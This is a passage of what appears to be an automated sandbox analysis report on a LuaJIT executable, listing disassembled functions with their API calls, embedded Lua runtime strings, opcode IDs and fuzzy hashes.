                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: wcsxfrm$_free_nolock
                                                      • String ID: .\?.dll;!\?.dll;!\loadall.dll$.\?.lua;!\lua\?.lua;!\lua\?\init.lua;$LUA_CPATH$LUA_NOENV$LUA_PATH$\;?!-$_LOADED$_LOADLIB$_PRELOAD$__gc$config$cpath$loaded$loaders$package$path$preload
                                                      • API String ID: 338564694-1474762456
                                                      • Opcode ID: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                      • Instruction ID: 952369fb544f8c91b51380a2405604428be1c5421c64c36157ec9f7ab7d7cc1c
                                                      • Opcode Fuzzy Hash: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                      • Instruction Fuzzy Hash: E3516221A2898682E710FB6DE8511AAE360FBD2759FC04232FA5D476ADCFFCE501C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DF7CA0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: wcsxfrm
                                                      • String ID: %s:$...$[builtin#%d]:$ at %p$ in function '%s'$ in function <%s:%d>$ in main chunk$%d:$%s$Snlf$stack traceback:
                                                      • API String ID: 1214967616-750625491
                                                      • Opcode ID: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                      • Instruction ID: 78be36eb344921d755fe25e20decd4e1db7839bd2f6f7d43a2d5b9225840a557
                                                      • Opcode Fuzzy Hash: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                      • Instruction Fuzzy Hash: 06913C726086C285DB70EB19E4403AEA7A0F7D5789F908532DB9D87B6CCEBCD5408B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E27E50 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _free_nolockwcsftime
                                                      • String ID: day$hour$isdst$min$month$sec$wday$yday$year
                                                      • API String ID: 793903186-297742768
                                                      • Opcode ID: 2aaffe12b0db6b9518b4475245139ff0e0a880d6dad9045458ec8c24c5b8c61e
                                                      • Instruction ID: 6fd7c1217e3be620feb9bebc7c090a7a13dd5697c60f524cb692c6ef7fc148aa
                                                      • Opcode Fuzzy Hash: 2aaffe12b0db6b9518b4475245139ff0e0a880d6dad9045458ec8c24c5b8c61e
                                                      • Instruction Fuzzy Hash: 23C14E32618B8585DB20DB19E49036AB7A0F7DABD9F900136EB8D83B69CF7CD440CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E0E5D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 52libraryloaderthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                      • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                      • API String ID: 4260375681-184456188
                                                      • Opcode ID: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                      • Instruction ID: 4ef49917249bc1de7c462125f6397b2b3736a70b8bc70422914054e22885271c
                                                      • Opcode Fuzzy Hash: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                      • Instruction Fuzzy Hash: C621EA36608B85C2EB10DB09E494369B371F796B49FA04036EB8D47768DF7ED885C700
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB215C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 479COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: -$f$p$p
                                                      • API String ID: 3215553584-2516539321
                                                      • Opcode ID: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                      • Instruction ID: 4488fb091527c7e03201d319c7ecee3fc214806493ac79d1f96d2723e4a26b42
                                                      • Opcode Fuzzy Hash: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                      • Instruction Fuzzy Hash: 3C12B421E0915386FB24EA1CD09427AF261EF6276AFD44331F799466CCDBBCF4828725
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E90144 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 849930591-393685449
                                                      • Opcode ID: 21daca37c64a951625de81c52c05d4c1e6152d44712894eceea29e405e421fc1
                                                      • Instruction ID: f11012d495246ce1b6672782298f4caadfbba10930963a8cd080bfa7ab8926b2
                                                      • Opcode Fuzzy Hash: 21daca37c64a951625de81c52c05d4c1e6152d44712894eceea29e405e421fc1
                                                      • Instruction Fuzzy Hash: 93E1B472A0874186EB20EB29D8402ADB7A4FB66BDDF900135DF4D57B5ACF78E091C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E8F3FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F481
                                                      • GetLastError.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F48F
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F4B9
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F4FF
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F50B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                      • String ID: api-ms-
                                                      • API String ID: 2559590344-2084034818
                                                      • Opcode ID: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                      • Instruction ID: f70184b6c30e93d8174277649edd5f334b9ef187a9e8a1a23918a49b7ccc152a
                                                      • Opcode Fuzzy Hash: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                      • Instruction Fuzzy Hash: E331F821B1A78291EF15BB4A9404575A2D4FF1ABAAF894635EF1D4B74CDFBCE440C320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1ECF1B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                      • String ID: CONOUT$
                                                      • API String ID: 3230265001-3130406586
                                                      • Opcode ID: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                      • Instruction ID: 707fc055b1cc6729566e72afaa157e7a0da96a870b4b48a16d251136de5aeb4a
                                                      • Opcode Fuzzy Hash: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                      • Instruction Fuzzy Hash: D611B721714A4282E7509B5AE844329E3A0FB9AFE9F844234EB5D8779CCFBCD5408750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DF6760 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 386COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =[C]$Lua$main
                                                      • API String ID: 0-2004024069
                                                      • Opcode ID: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                      • Instruction ID: b3bd0699e18e298d8da89bff4153159babc2c7ec834212d23ad472a1ce83872a
                                                      • Opcode Fuzzy Hash: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                      • Instruction Fuzzy Hash: 1A22C736608B8585DB70DB19E0803AEBBA0F799B94F504136DB9D87BA8DF7CD584CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E0E430 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: C$I$J$N
                                                      • API String ID: 3168844106-327184588
                                                      • Opcode ID: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                      • Instruction ID: 7df7a875f5ad07c7981d46bc5b6a8fcc0a9e0997f4e6965fdf62174bd90017c6
                                                      • Opcode Fuzzy Hash: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                      • Instruction Fuzzy Hash: 66311A7261D7818AD760DB19E04522AFBA0F799B69F001236FB9E43B98CBBCD545CF04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAFCD0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: "$cosh
                                                      • API String ID: 1156100317-3800341493
                                                      • Opcode ID: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                      • Instruction ID: c3db85587070975427265b6a2b9b8cdcd403388a968443e205ffae31eb04edd6
                                                      • Opcode Fuzzy Hash: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                      • Instruction Fuzzy Hash: FA81AB31928F8188D363DF3864413B6B354AF773DAF559337E64E35A59DFACA0828610
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E90978 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                      • String ID: csm$csm
                                                      • API String ID: 851805269-3733052814
                                                      • Opcode ID: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                      • Instruction ID: b23b1fe9f107cd33ea34e042c1cefeb4df3ec514132c71b16969e0d9d73f4665
                                                      • Opcode Fuzzy Hash: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                      • Instruction Fuzzy Hash: 9661A5329083428AEB24AF199844268B7A4EB66BDDFD84235DB4D47799DFBCF490C710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E12AA0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: type_info::_name_internal_method
                                                      • String ID: builtin#$false$nil$true
                                                      • API String ID: 3713626258-3570738779
                                                      • Opcode ID: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                      • Instruction ID: 1c22a215694f1f42494fd7c6226cf938b73390c10d53cacc2d7bd5466e317ec9
                                                      • Opcode Fuzzy Hash: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                      • Instruction Fuzzy Hash: 9B61162661CB4585EB209B1DE48012DB7A0F799BA9F905332EB9D877F8CF7CD1508B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E2B290 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$_mbsncpy_s
                                                      • String ID: (error object is not a string)$=(debug command)$cont$lua_debug>
                                                      • API String ID: 1341846612-1452030528
                                                      • Opcode ID: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                      • Instruction ID: 47a7c14a88e23d126da349cc1ae73ff28d97f7b9a4961ff5c900494dab5e2835
                                                      • Opcode Fuzzy Hash: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                      • Instruction Fuzzy Hash: 2F318A21A2CA4281FB64B719D4553BED390AFE6399FC04039FF4D466DDDEACE1008720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E29610 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock_mbsncpy_s
                                                      • String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
                                                      • API String ID: 1937151238-4005544233
                                                      • Opcode ID: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                      • Instruction ID: 45a9308cb8fc517d804997fd55ce77fdb7d07ce5d05edc46e7d0d063b052b487
                                                      • Opcode Fuzzy Hash: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                      • Instruction Fuzzy Hash: C0218561518A8581DB20BB69D8501ABE350FBD63A9F805335FBAD476DDCEECD500C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAAD68 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
